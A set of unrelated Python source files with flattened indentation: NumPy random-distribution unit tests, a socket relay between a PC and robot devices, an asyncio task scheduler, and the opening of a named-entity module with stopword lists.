kappa = [1]
bad_kappa = [-1]
desired = np.array([2.25935584988528, 2.23326261461399, -2.84152146503326])
random = Generator(MT19937(self.seed))
actual = random.vonmises(mu * 3, kappa)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, random.vonmises, mu * 3, bad_kappa)
random = Generator(MT19937(self.seed))
actual = random.vonmises(mu, kappa * 3)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, random.vonmises, mu, bad_kappa * 3)
def test_pareto(self):
a = [1]
bad_a = [-1]
desired = np.array([0.95905052946317, 0.2383810889437 , 1.04988745750013])
random = Generator(MT19937(self.seed))
actual = random.pareto(a * 3)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, random.pareto, bad_a * 3)
def test_weibull(self):
a = [1]
bad_a = [-1]
desired = np.array([0.67245993212806, 0.21380495318094, 0.7177848928629])
random = Generator(MT19937(self.seed))
actual = random.weibull(a * 3)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, random.weibull, bad_a * 3)
def test_power(self):
a = [1]
bad_a = [-1]
desired = np.array([0.48954864361052, 0.19249412888486, 0.51216834058807])
random = Generator(MT19937(self.seed))
actual = random.power(a * 3)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, random.power, bad_a * 3)
def test_laplace(self):
loc = [0]
scale = [1]
bad_scale = [-1]
desired = np.array([-1.09698732625119, -0.93470271947368, 0.71592671378202])
random = Generator(MT19937(self.seed))
laplace = random.laplace
actual = laplace(loc * 3, scale)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, laplace, loc * 3, bad_scale)
random = Generator(MT19937(self.seed))
laplace = random.laplace
actual = laplace(loc, scale * 3)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, laplace, loc, bad_scale * 3)
def test_gumbel(self):
loc = [0]
scale = [1]
bad_scale = [-1]
desired = np.array([1.70020068231762, 1.52054354273631, -0.34293267607081])
random = Generator(MT19937(self.seed))
gumbel = random.gumbel
actual = gumbel(loc * 3, scale)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, gumbel, loc * 3, bad_scale)
random = Generator(MT19937(self.seed))
gumbel = random.gumbel
actual = gumbel(loc, scale * 3)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, gumbel, loc, bad_scale * 3)
def test_logistic(self):
loc = [0]
scale = [1]
bad_scale = [-1]
desired = np.array([-1.607487640433, -1.40925686003678, 1.12887112820397])
random = Generator(MT19937(self.seed))
actual = random.logistic(loc * 3, scale)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, random.logistic, loc * 3, bad_scale)
random = Generator(MT19937(self.seed))
actual = random.logistic(loc, scale * 3)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, random.logistic, loc, bad_scale * 3)
assert_equal(random.logistic(1.0, 0.0), 1.0)
def test_lognormal(self):
mean = [0]
sigma = [1]
bad_sigma = [-1]
desired = np.array([0.67884390500697, 2.21653186290321, 1.01990310084276])
random = Generator(MT19937(self.seed))
lognormal = random.lognormal
actual = lognormal(mean * 3, sigma)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, lognormal, mean * 3, bad_sigma)
random = Generator(MT19937(self.seed))
actual = random.lognormal(mean, sigma * 3)
assert_raises(ValueError, random.lognormal, mean, bad_sigma * 3)
def test_rayleigh(self):
scale = [1]
bad_scale = [-1]
desired = np.array([0.60439534475066, 0.66120048396359, 1.67873398389499])
random = Generator(MT19937(self.seed))
actual = random.rayleigh(scale * 3)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, random.rayleigh, bad_scale * 3)
def test_wald(self):
mean = [0.5]
scale = [1]
bad_mean = [0]
bad_scale = [-2]
desired = np.array([0.38052407392905, 0.50701641508592, 0.484935249864])
random = Generator(MT19937(self.seed))
actual = random.wald(mean * 3, scale)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, random.wald, bad_mean * 3, scale)
assert_raises(ValueError, random.wald, mean * 3, bad_scale)
random = Generator(MT19937(self.seed))
actual = random.wald(mean, scale * 3)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, random.wald, bad_mean, scale * 3)
assert_raises(ValueError, random.wald, mean, bad_scale * 3)
def test_triangular(self):
left = [1]
right = [3]
mode = [2]
bad_left_one = [3]
bad_mode_one = [4]
bad_left_two, bad_mode_two = right * 2
desired = np.array([1.57781954604754, 1.62665986867957, 2.30090130831326])
random = Generator(MT19937(self.seed))
triangular = random.triangular
actual = triangular(left * 3, mode, right)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, triangular, bad_left_one * 3, mode, right)
assert_raises(ValueError, triangular, left * 3, bad_mode_one, right)
assert_raises(ValueError, triangular, bad_left_two * 3, bad_mode_two,
right)
random = Generator(MT19937(self.seed))
triangular = random.triangular
actual = triangular(left, mode * 3, right)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, triangular, bad_left_one, mode * 3, right)
assert_raises(ValueError, triangular, left, bad_mode_one * 3, right)
assert_raises(ValueError, triangular, bad_left_two, bad_mode_two * 3,
right)
random = Generator(MT19937(self.seed))
triangular = random.triangular
actual = triangular(left, mode, right * 3)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, triangular, bad_left_one, mode, right * 3)
assert_raises(ValueError, triangular, left, bad_mode_one, right * 3)
assert_raises(ValueError, triangular, bad_left_two, bad_mode_two,
right * 3)
assert_raises(ValueError, triangular, 10., 0., 20.)
assert_raises(ValueError, triangular, 10., 25., 20.)
assert_raises(ValueError, triangular, 10., 10., 10.)
def test_binomial(self):
n = [1]
p = [0.5]
bad_n = [-1]
bad_p_one = [-1]
bad_p_two = [1.5]
desired = np.array([0, 0, 1])
random = Generator(MT19937(self.seed))
binom = random.binomial
actual = binom(n * 3, p)
assert_array_equal(actual, desired)
assert_raises(ValueError, binom, bad_n * 3, p)
assert_raises(ValueError, binom, n * 3, bad_p_one)
assert_raises(ValueError, binom, n * 3, bad_p_two)
random = Generator(MT19937(self.seed))
actual = random.binomial(n, p * 3)
assert_array_equal(actual, desired)
assert_raises(ValueError, binom, bad_n, p * 3)
assert_raises(ValueError, binom, n, bad_p_one * 3)
assert_raises(ValueError, binom, n, bad_p_two * 3)
def test_negative_binomial(self):
n = [1]
p = [0.5]
bad_n = [-1]
bad_p_one = [-1]
bad_p_two = [1.5]
desired = np.array([0, 2, 1], dtype=np.int64)
random = Generator(MT19937(self.seed))
neg_binom = random.negative_binomial
actual = neg_binom(n * 3, p)
assert_array_equal(actual, desired)
assert_raises(ValueError, neg_binom, bad_n * 3, p)
assert_raises(ValueError, neg_binom, n * 3, bad_p_one)
assert_raises(ValueError, neg_binom, n * 3, bad_p_two)
random = Generator(MT19937(self.seed))
neg_binom = random.negative_binomial
actual = neg_binom(n, p * 3)
assert_array_equal(actual, desired)
assert_raises(ValueError, neg_binom, bad_n, p * 3)
assert_raises(ValueError, neg_binom, n, bad_p_one * 3)
assert_raises(ValueError, neg_binom, n, bad_p_two * 3)
def test_poisson(self):
lam = [1]
bad_lam_one = [-1]
desired = np.array([0, 0, 3])
random = Generator(MT19937(self.seed))
max_lam = random._poisson_lam_max
bad_lam_two = [max_lam * 2]
poisson = random.poisson
actual = poisson(lam * 3)
assert_array_equal(actual, desired)
assert_raises(ValueError, poisson, bad_lam_one * 3)
assert_raises(ValueError, poisson, bad_lam_two * 3)
def test_zipf(self):
a = [2]
bad_a = [0]
desired = np.array([1, 8, 1])
random = Generator(MT19937(self.seed))
zipf = random.zipf
actual = zipf(a * 3)
assert_array_equal(actual, desired)
assert_raises(ValueError, zipf, bad_a * 3)
with np.errstate(invalid='ignore'):
assert_raises(ValueError, zipf, np.nan)
assert_raises(ValueError, zipf, [0, 0, np.nan])
def test_geometric(self):
p = [0.5]
bad_p_one = [-1]
bad_p_two = [1.5]
desired = np.array([1, 1, 3])
random = Generator(MT19937(self.seed))
geometric = random.geometric
actual = geometric(p * 3)
assert_array_equal(actual, desired)
assert_raises(ValueError, geometric, bad_p_one * 3)
assert_raises(ValueError, geometric, bad_p_two * 3)
def test_hypergeometric(self):
ngood = [1]
nbad = [2]
nsample = [2]
bad_ngood = [-1]
bad_nbad = [-2]
bad_nsample_one = [-1]
bad_nsample_two = [4]
desired = np.array([0, 0, 1])
random = Generator(MT19937(self.seed))
actual = random.hypergeometric(ngood * 3, nbad, nsample)
assert_array_equal(actual, desired)
assert_raises(ValueError, random.hypergeometric, bad_ngood * 3, nbad, nsample)
assert_raises(ValueError, random.hypergeometric, ngood * 3, bad_nbad, nsample)
assert_raises(ValueError, random.hypergeometric, ngood * 3, nbad, bad_nsample_one)
assert_raises(ValueError, random.hypergeometric, ngood * 3, nbad, bad_nsample_two)
random = Generator(MT19937(self.seed))
actual = random.hypergeometric(ngood, nbad * 3, nsample)
assert_array_equal(actual, desired)
assert_raises(ValueError, random.hypergeometric, bad_ngood, nbad * 3, nsample)
assert_raises(ValueError, random.hypergeometric, ngood, bad_nbad * 3, nsample)
assert_raises(ValueError, random.hypergeometric, ngood, nbad * 3, bad_nsample_one)
assert_raises(ValueError, random.hypergeometric, ngood, nbad * 3, bad_nsample_two)
random = Generator(MT19937(self.seed))
hypergeom = random.hypergeometric
actual = hypergeom(ngood, nbad, nsample * 3)
assert_array_equal(actual, desired)
assert_raises(ValueError, hypergeom, bad_ngood, nbad, nsample * 3)
assert_raises(ValueError, hypergeom, ngood, bad_nbad, nsample * 3)
assert_raises(ValueError, hypergeom, ngood, nbad, bad_nsample_one * 3)
assert_raises(ValueError, hypergeom, ngood, nbad, bad_nsample_two * 3)
assert_raises(ValueError, hypergeom, -1, 10, 20)
assert_raises(ValueError, hypergeom, 10, -1, 20)
assert_raises(ValueError, hypergeom, 10, 10, -1)
assert_raises(ValueError, hypergeom, 10, 10, 25)
# ValueError for arguments that are too big.
assert_raises(ValueError, hypergeom, 2**30, 10, 20)
assert_raises(ValueError, hypergeom, 999, 2**31, 50)
assert_raises(ValueError, hypergeom, 999, [2**29, 2**30], 1000)
def test_logseries(self):
p = [0.5]
bad_p_one = [2]
bad_p_two = [-1]
desired = np.array([1, 1, 1])
random = Generator(MT19937(self.seed))
logseries = random.logseries
actual = logseries(p * 3)
assert_array_equal(actual, desired)
assert_raises(ValueError, logseries, bad_p_one * 3)
assert_raises(ValueError, logseries, bad_p_two * 3)
def test_multinomial(self):
random = Generator(MT19937(self.seed))
actual = random.multinomial([5, 20], [1 / 6.] * 6, size=(3, 2))
desired = np.array([[[0, 0, 2, 1, 2, 0],
[2, 3, 6, 4, 2, 3]],
[[1, 0, 1, 0, 2, 1],
[7, 2, 2, 1, 4, 4]],
[[0, 2, 0, 1, 2, 0],
[3, 2, 3, 3, 4, 5]]], dtype=np.int64)
assert_array_equal(actual, desired)
random = Generator(MT19937(self.seed))
actual = random.multinomial([5, 20], [1 / 6.] * 6)
desired = np.array([[0, 0, 2, 1, 2, 0],
[2, 3, 6, 4, 2, 3]], dtype=np.int64)
assert_array_equal(actual, desired)
class TestThread(object):
# make sure each state produces the same sequence even in threads
def setup(self):
self.seeds = range(4)
def check_function(self, function, sz):
from threading import Thread
out1 = np.empty((len(self.seeds),) + sz)
out2 = np.empty((len(self.seeds),) + sz)
# threaded generation
t = [Thread(target=function, args=(Generator(MT19937(s)), o))
for s, o in zip(self.seeds, out1)]
[x.start() for x in t]
[x.join() for x in t]
# the same serial
for s, o in zip(self.seeds, out2):
function(Generator(MT19937(s)), o)
# these platforms change x87 fpu precision mode in threads
if np.intp().dtype.itemsize == 4 and sys.platform == "win32":
assert_array_almost_equal(out1, out2)
else:
assert_array_equal(out1, out2)
def test_normal(self):
def gen_random(state, out):
out[...] = state.normal(size=10000)
self.check_function(gen_random, sz=(10000,))
def test_exp(self):
def gen_random(state, out):
out[...] = state.exponential(scale=np.ones((100, 1000)))
self.check_function(gen_random, sz=(100, 1000))
def test_multinomial(self):
def gen_random(state, out):
out[...] = state.multinomial(10, [1 / 6.] * 6, size=10000)
self.check_function(gen_random, sz=(10000, 6))
# See Issue #4263
class TestSingleEltArrayInput(object):
def setup(self):
self.argOne = np.array([2])
self.argTwo = np.array([3])
self.argThree = np.array([4])
self.tgtShape = (1,)
def test_one_arg_funcs(self):
funcs = (random.exponential, random.standard_gamma,
random.chisquare, random.standard_t,
random.pareto, random.weibull,
random.power, random.rayleigh,
random.poisson, random.zipf,
random.geometric, random.logseries)
probfuncs = (random.geometric, random.logseries)
for func in funcs:
if func in probfuncs: # p < 1.0
out = func(np.array([0.5]))
else:
out = func(self.argOne)
assert_equal(out.shape, self.tgtShape)
def test_two_arg_funcs(self):
funcs = (random.uniform, random.normal,
random.beta, random.gamma,
random.f, random.noncentral_chisquare,
random.vonmises, random.laplace,
random.gumbel, random.logistic,
random.lognormal, random.wald,
random.binomial, random.negative_binomial)
probfuncs = (random.binomial, random.negative_binomial)
for func in funcs:
if func in probfuncs: # p <= 1
argTwo = np.array([0.5])
else:
argTwo = self.argTwo
out = func(self.argOne, argTwo)
assert_equal(out.shape, self.tgtShape)
out = func(self.argOne[0], argTwo)
assert_equal(out.shape, self.tgtShape)
out = func(self.argOne, argTwo[0])
assert_equal(out.shape, self.tgtShape)
def test_integers(self, endpoint):
itype = [np.bool, np.int8, np.uint8, np.int16, np.uint16,
np.int32, np.uint32, np.int64, np.uint64]
func = random.integers
high = np.array([1])
low = np.array([0])
for dt in itype:
out = func(low, high, endpoint=endpoint, dtype=dt)
assert_equal(out.shape, self.tgtShape)
out = func(low[0], high, endpoint=endpoint, dtype=dt)
assert_equal(out.shape, self.tgtShape)
out = func(low, high[0], endpoint=endpoint, dtype=dt)
assert_equal(out.shape, self.tgtShape)
def test_three_arg_funcs(self):
funcs = [random.noncentral_f, random.triangular,
random.hypergeometric]
for func in funcs:
out = func(self.argOne, self.argTwo, self.argThree)
assert_equal(out.shape, self.tgtShape)
out = func(self.argOne[0], self.argTwo, self.argThree)
assert_equal(out.shape, self.tgtShape)
out = func(self.argOne, self.argTwo[0], self.argThree)
assert_equal(out.shape, self.tgtShape)
|
PCV3.py
|
import socket
import select
import sys
import threading
from sendImg import *
class PCV3:
def __init__(self):
self.host = "192.168.16.16"
self.port = 9123
self.connected = False
def connect(self):
self.socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.socket.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
print("Socket established successfully.")
try:
self.socket.bind((self.host, self.port))
print("Socket binded successfully.")
except socket.error as e:
print("Socket binding failed: %s" %str(e))
sys.exit()
self.socket.listen(3)
print("Waiting for PC connection...")
self.client_socket, self.address = self.socket.accept()
print("PC connected successfully.")
self.connected = True
def connectImg(self):
self.sendImg = sendImg()
def disconnect(self):
try:
self.socket.close()
self.socket = -1
print("Disconnected from PC successfully.")
except Exception as e:
print("Failed to disconnect from PC: %s" %str(e))
self.connected = False
def readThread(self, arduino, android):
while True:
try:
messages = self.client_socket.recv(1024)
if not messages:
print("PC disconnected remotely.")
self.disconnect()
return
test = messages.split(b'\r\n')
for message in test:
print("Read from PC: %s" %str(message))
if len(message) <= 1:
continue
if (message[0] == 65):
arduino.write(message[1:] + '\n'.encode("utf-8"))
continue
if ( message[0] == 82 and message[1] == 80):
threading.Thread(target=self.sendImg.takePic).start()
continue
if (message[0] == 68):
android.write(message[1:] + '\n'.encode("utf-8"))
continue
except socket.error as e:
print("Failed to read from PC: %s" %str(e))
self.disconnect()
return
except IOError as ie:
print("Failed to read from PC: %s" %str(ie))
except Exception as e2:
print("Failed to read from PC: %s" %str(e2))
self.disconnect()
return
def write(self, message):
try:
self.client_socket.sendto(message, self.address)
print("Write to PC: %s" %str(message))
print()
except ConnectionResetError:
self.disconnect()
except socket.error:
self.disconnect()
except IOError as e:
print("Failed to write to PC: %s" %str(e))
|
core.py
|
import asyncio
import itertools
import uuid
from dataclasses import dataclass
from enum import Enum
from itertools import chain
from queue import Empty, Queue
from threading import Thread
from typing import TYPE_CHECKING, Any, Callable, Dict, Iterable, List, Type
from structlog import get_logger
from .bases import TaskPropertyBase
from .distributed_apis import DEFAULT_DIST_API_KEY, get_dist_api
from .exceptions import ActorListenBreaker, ActorPoisoned, NotEnoughResourcesToContinue
from .exchange import CapsetExchange
from .resource_handling import Capability, CapabilitySet, NumStore
if TYPE_CHECKING:
from .bases import ActorBase, DistAPIBase # pragma: no cover
POISON_KEY = frozenset([]) # just make sure it comes before any other
POISON_PILL = None
ALLOWED_CONSUMER_FAILS = 5
def _start_loop(loop: asyncio.AbstractEventLoop) -> None:
asyncio.set_event_loop(loop)
loop.run_forever()
def _get_loop_of_daemon():
loop = asyncio.new_event_loop()
Thread(target=_start_loop, args=(loop,), daemon=True).start()
return loop
class Scheduler:
def __init__(
self,
actor_dict: Dict[CapabilitySet, Type["ActorBase"]],
resource_limits: Dict[Enum, float],
distributed_system: str = DEFAULT_DIST_API_KEY,
verbose=False,
) -> None:
"""Core scheduler class
default reorganize when:
- new tasks are added
- no new task can be consumed
-
"""
self._result_queue = Queue()
self._active_async_tasks = set()
self._task_queues: Dict[CapabilitySet, TaskQueue] = {}
self._loop = _get_loop_of_daemon()
self._verbose = verbose
self._dist_api: DistAPIBase = get_dist_api(distributed_system)()
self._actor_sets: Dict[CapabilitySet, ActorSet] = {}
self._run(self._add_actor_sets(actor_dict))
self._capset_exchange = CapsetExchange(actor_dict.keys(), resource_limits)
# TODO
# concurrent_task_limit: Callable[[List[TaskPropertyBase]], bool]
# self._active_task_properties = ActiveTaskPropertySet()
# self._task_limiter = concurrent_task_limit
def __del__(self):
try:
self._dist_api.join()
except AttributeError: # pragma: no cover
pass
def process(
self,
batch_producer: Callable[[], List["SchedulerTask"]],
result_processor=None,
min_queue_size: int = 0,
):
while True:
is_done = self.is_idle
(result_processor or list)(self.get_processed_results())
next_batch = batch_producer()
batch_size = len(next_batch)
empty_batch = batch_size == 0
self._log("new batch", size=batch_size, was_done=is_done)
if is_done and empty_batch:
break
if empty_batch:
self.wait_until_n_tasks_remain(0)
continue
self.refill_task_queue(next_batch)
try:
self.wait_until_n_tasks_remain(min_queue_size)
except KeyboardInterrupt: # pragma: no cover
self._log(f"Interrupted waiting for {self}")
break
def refill_task_queue(self, task_batch: Iterable["SchedulerTask"]):
self._run(self._refill_task_queue(task_batch))
def wait_until_n_tasks_remain(self, remaining_tasks: int = 0):
self._run(self._await_until(remaining_tasks))
def join(self):
self.wait_until_n_tasks_remain(0)
self._run(self._drain_all_actor_sets())
try:
self._run(asyncio.wait(self._all_actors))
except AssertionError:
pass
self._run(self._cleanup())
self._dist_api.join()
def get_processed_results(self) -> Iterable:
while True:
try:
yield self._result_queue.get(False)
except Empty:
break
@property
def is_empty(self) -> bool:
return self.is_idle and self._result_queue.empty()
@property
def is_idle(self) -> bool:
return not self._active_async_tasks
@property
def queued_task_count(self):
return sum([tq.size for tq in self._task_queues.values()])
def _run(self, coro, wait=True):
fut = asyncio.run_coroutine_threadsafe(coro, self._loop)
if wait:
fut.result()
def _log(self, logstr, **kwargs):
if self._verbose:
get_logger(
api=type(self._dist_api).__name__,
queued=self.queued_task_count,
working=self._running_consumer_count,
).info(logstr, **kwargs)
def _q_of_new_capset(self, capset: CapabilitySet) -> asyncio.Queue:
new_task_queue = TaskQueue()
self._task_queues[capset] = new_task_queue
for task_cs, task_queue in self._task_queues.items():
if task_cs > capset:
task_queue.reset_ping()
return new_task_queue
async def _add_actor_sets(self, actor_dict):
self._actor_sets = {
capset: ActorSet(
actor_cls,
self._dist_api,
capset,
self._task_queues,
self._verbose,
)
for capset, actor_cls in actor_dict.items()
}
async def _refill_task_queue(self, task_batch: Iterable["SchedulerTask"]):
for scheduler_task in task_batch:
await self._add_task(scheduler_task)
await self._reorganize_actors()
async def _add_task(self, scheduler_task: "SchedulerTask"):
coro = self._await_future_and_put_result_to_queue(scheduler_task)
async_task = self._loop.create_task(coro)
self._active_async_tasks.add(async_task)
capset = scheduler_task.requirements
q = self._task_queues.get(capset) or self._q_of_new_capset(capset)
await q.put(scheduler_task)
async def _await_future_and_put_result_to_queue(
self, scheduler_task: "SchedulerTask"
):
scheduler_task.init_future()
task_result: TaskResult = await scheduler_task.future
self._result_queue.put(task_result.value)
if task_result.is_last_in_queue and self.queued_task_count:
await self._reorganize_actors()
async def _reorganize_actors(self):
"""optimize actor set sizes
target: minimize max n(tasks<=capset) / n(actors>=capset)
for all task queue capsets
limit: capset resource use * n_actors <=total resource avail
for all actorset capsets
heuristic:
value of adding: decrease caused in target / number possible remaining
"""
need_dic = {cs: t.size for cs, t in self._task_queues.items()}
new_needs = NumStore(need_dic)
new_ideals = self._capset_exchange.set_values(new_needs)
self._log(f"reorganizing on {need_dic}")
self._log(f"reorganizing to {new_ideals}")
for cs, new_ideal in new_ideals.items():
await self._actor_sets[cs].set_running_actors_to(new_ideal)
dead_end = self.queued_task_count and self._capset_exchange.idle
if dead_end:
await self._cleanup()
await self._cancel_remaining_tasks()
raise NotEnoughResourcesToContinue(
f"{self.queued_task_count} remaining and no launchable actors"
)
async def _await_until(self, remaining_tasks: int = 0):
return_when = "FIRST_COMPLETED" if remaining_tasks > 0 else "ALL_COMPLETED"
while len(self._active_async_tasks) > remaining_tasks:
done, _ = await asyncio.wait(
self._active_async_tasks, return_when=return_when
)
self._active_async_tasks.difference_update(done)
await self._reorganize_actors()
async def _drain_all_actor_sets(self):
for actor_set in self._actor_sets.values():
await actor_set.drain_to(0)
async def _cleanup(self):
for aset in self._actor_sets.values():
aset.poison_queue.cancel()
for t_queue in self._task_queues.values():
t_queue.cancel()
async def _cancel_remaining_tasks(self):
for atask in self._active_async_tasks:
atask.cancel()
@property
def _running_consumer_count(self):
return sum([aset.running_actor_count for aset in self._actor_sets.values()])
@property
def _all_actors(self):
return itertools.chain(
*[aset.all_actor_tasks for aset in self._actor_sets.values()]
)
class TaskQueue:
def __init__(self) -> None:
self.queue = asyncio.Queue()
self.getting_task: asyncio.Task = asyncio.create_task(self.queue.get())
self.ping = asyncio.Future()
self.put = self.queue.put
def reset_ping(self):
self.ping.set_result(None)
self.ping = asyncio.Future()
def pop(self):
out = self.getting_task.result()
self.getting_task = asyncio.create_task(self.queue.get())
return out
@property
def cancel(self):
return self.getting_task.cancel
@property
def done(self):
return self.getting_task.done
@property
def size(self):
return self.queue.qsize() + int(self.getting_task.done())
@property
def tasks(self):
return [self.ping, self.getting_task]
class ActorSet:
def __init__(
self,
actor_cls: Type["ActorBase"],
dist_api: "DistAPIBase",
capset: CapabilitySet,
task_queues: Dict[CapabilitySet, TaskQueue],
debug: bool,
) -> None:
self.actor_cls = actor_cls
self.dist_api = dist_api
self.capset = capset
self.poison_queue = TaskQueue()
self._poisoning_done_future = asyncio.Future()
self._task_queues = task_queues
self._actor_listening_async_task_dict: Dict[str, asyncio.Task] = {}
self._debug = debug
def __repr__(self):
dic_str = [f"{k}={v}" for k, v in self._log_dic.items()]
return f"{type(self).__name__}({', '.join(dic_str)}"
async def set_running_actors_to(self, target_count):
if target_count < self.running_actor_count:
await self.drain_to(target_count)
elif target_count > self.running_actor_count:
for _ in range(self.running_actor_count, target_count):
await self.add_new_actor()
async def drain_to(self, target_count: int) -> int:
n = 0
for _ in range(target_count, self.running_actor_count):
n += 1
await self.poison_queue.put(POISON_PILL)
await self._poisoning_done_future
self._poisoning_done_future = asyncio.Future()
return n
async def add_new_actor(self):
running_actor = self.dist_api.get_running_actor(actor_cls=self.actor_cls)
listener_name = uuid.uuid1().hex
coroutine = self._listen(
running_actor=running_actor,
name=listener_name,
)
task = asyncio.create_task(coroutine, name=listener_name)
self._log("adding consumer", listener_task=task.get_name())
self._actor_listening_async_task_dict[listener_name] = task
@property
def task_count(self):
return sum([q.size for q in self._task_queues.values()])
@property
def running_actor_count(self):
return len(self._actor_listening_async_task_dict)
@property
def all_actor_tasks(self):
return self._actor_listening_async_task_dict.values()
async def _listen(self, running_actor: "ActorBase", name: str):
self._log(
"consumer listening",
running=type(running_actor).__name__,
)
fails = 0
while True:
next_task = await self._get_next_task()
try:
fails = await self._process_task(running_actor, next_task, fails)
except ActorListenBreaker as e:
self._log(
"stopping consumer",
reason=e,
running=type(running_actor).__name__,
)
self.dist_api.kill(running_actor)
del self._actor_listening_async_task_dict[name]
self._poisoning_done_future.set_result(True)
if not isinstance(e, ActorPoisoned):
await self.add_new_actor()
return
async def _get_next_task(self) -> "SchedulerTask":
while True:
await asyncio.wait(
self._wait_on_tasks,
return_when="FIRST_COMPLETED",
)
for t_queue in self._sorted_queues:
if t_queue.done():
return t_queue.pop()
async def _process_task(
self,
running_actor: "ActorBase",
next_task: "SchedulerTask",
fails: int,
):
if next_task is POISON_PILL:
raise ActorPoisoned("poisoned")
try:
out = await self.dist_api.get_future(running_actor, next_task)
if isinstance(out, Exception):
raise out
result = TaskResult(out, True, self._is_last(next_task))
next_task.set_future(result)
return 0
except self.dist_api.exception as e:
self._log("Remote consumption error ", e=e, te=type(e))
if self._debug:
self._logger.exception(e)
next_task.fail_count += 1
if next_task.fail_count > next_task.max_fails:
is_last = self._is_last(next_task)
result = TaskResult(self.dist_api.parse_exception(e), False, is_last)
next_task.set_future(result)
else:
await self._task_queues[next_task.requirements].put(next_task)
if fails >= ALLOWED_CONSUMER_FAILS:
raise ActorListenBreaker(f"{fails} number of fails reached")
return fails + 1
def _log(self, s, **kwargs):
if self._debug:
self._logger.info(s, **kwargs)
def _is_last(self, task: "SchedulerTask"):
return self._task_queues[task.requirements].size == 0
@property
def _wait_on_tasks(self):
return chain(
*[self._task_queues[k].tasks for k in self._task_keys],
[self.poison_queue.getting_task],
)
@property
def _sorted_queues(self):
keys = sorted(self._task_keys)
return reversed([self.poison_queue, *map(self._task_queues.get, keys)])
@property
def _task_keys(self):
return filter(self.capset.__ge__, self._task_queues.keys())
@property
def _logger(self):
return get_logger(**self._log_dic)
@property
def _log_dic(self):
return {
"actor": self.actor_cls.__name__,
"tasks": self.task_count,
"actors_running": self.running_actor_count,
}
class SchedulerTask:
def __init__(
self,
argument: Any,
requirements: List[Capability] = None,
properties: List[TaskPropertyBase] = None,
allowed_fail_count: int = 1,
):
self.argument = argument
self.requirements = CapabilitySet(requirements or [])
self.properties = properties or []
self.max_fails = allowed_fail_count
self.fail_count = 0
self.future = None
def __repr__(self) -> str:
return (
f"Task: {self.argument}, "
"Requires: {self.requirements}, "
"Future: {self.future}"
)
def init_future(self):
self.future = asyncio.Future()
def set_future(self, task_result):
self.future.set_result(task_result)
@dataclass
class TaskResult:
value: Any
is_ok: bool
is_last_in_queue: bool
|
SatadishaModule_final_trie.py
|
# coding: utf-8
# In[298]:
import sys
import re
import string
import csv
import random
import time
#import binascii
#import shlex
import numpy as np
import pandas as pd
from itertools import groupby
from operator import itemgetter
from collections import Iterable, OrderedDict
from nltk.tokenize import sent_tokenize, word_tokenize
from nltk.corpus import stopwords
from scipy import stats
#from datasketch import MinHash, MinHashLSH
import NE_candidate_module as ne
import NE_candidate_module as ne
import Mention
import threading, queue
import time
import datetime
import copy
import trie as trie
# In[324]:
#---------------------Existing Lists--------------------
cachedStopWords = stopwords.words("english")
tempList=["i","and","or","other","another","across","were","you","then","still","is","while","till","nor","perhaps","otherwise","until","sometimes","sometime","seem","cannot","seems","because","can","like","into","able","unable","either","neither","if","we","it","else","elsewhere","how","not","what","who","when","where","where's","whereโs","where'd","whereโd","where'll","whereโll","who's","whoโs","he's","heโs","heโd","he'd","she's","sheโs","sheโd","she'd","let","today","tomorrow","tonight","let's","letโs","lets","know","make","oh","via","i","yet","must","mustnt","mustn't","mustnโt","i'll","iโll","you'll","youโll","we'll","weโll","done","doesnt","doesn't","doesnโt","dont","don't","donโt","did","didnt","didn't","didnโt","much","without","could","couldn't","couldnโt","would","wouldn't","wouldnโt","should","shouldn't","shouldnโt","shall","isn't","isnโt","hasn't","hasnโt","was","wasn't","wasnโt","also","let's","letโs","let","well","just","everyone","anyone","noone","none","someone","theres","there's","thereโs","everybody","nobody","somebody","anything","else","elsewhere","something","nothing","everything","i'd","iโd","iโm","won't","wonโt","iโve","i've","they're","theyโre","weโre","we're","we'll","weโll","weโve","we've","theyโve","they've","theyโd","they'd","theyโll","they'll","again","you're","youโre","you've","youโve","thats","that's",'thatโs','hereโs',"here's","what's","whatโs","iโm","i'm","a","so","except","arn't","aren't","arent","this","when","it","itโs","it's","he's","she's","she'd","he'd","he'll","she'll","sheโll","many","can't","cant","canโt","werent","weren't","wereโt","even","yes","no","these","here","there","to","maybe","<hashtag>","<hashtag>.","ever","every","never","there's","thereโs","whenever","wherever","however","whatever","always"]
prep_list=["in","at","of","on","with","by","&;"] #includes common conjunction as well
article_list=["a","an","the"]
day_list=["sunday","monday","tuesday","wednesday","thursday","friday","saturday","mon","tues","wed","thurs","fri","sat","sun"]
month_list=["january","february","march","april","may","june","july","august","september","october","november","december","jan","feb","mar","apr","may","jun","jul","aug","sep","oct","nov","dec"]
for item in tempList:
if item not in cachedStopWords:
cachedStopWords.append(item)
cachedStopWords.remove("don")
#cachedStopWords.remove("may")
cachedTitles = ["mr.","mr","mrs.","mrs","miss","ms","sen.","dr","dr.","prof.","president","congressman"]
chat_word_list=["please","4get","ooh","idk","oops","yup","stfu","uhh","2b","dear","yay","btw","ahhh","b4","ugh","ty","cuz","coz","sorry","yea","asap","ur","bs","rt","lfmao","slfmao","u","r","nah","umm","ummm","thank","thanks","congrats","whoa","rofl","ha","ok","okay","hey","hi","huh","ya","yep","yeah","fyi","duh","damn","lol","omg","congratulations","fuck","wtf","wth","aka","wtaf","xoxo","rofl","imo","wow","fck","haha","hehe","hoho"]
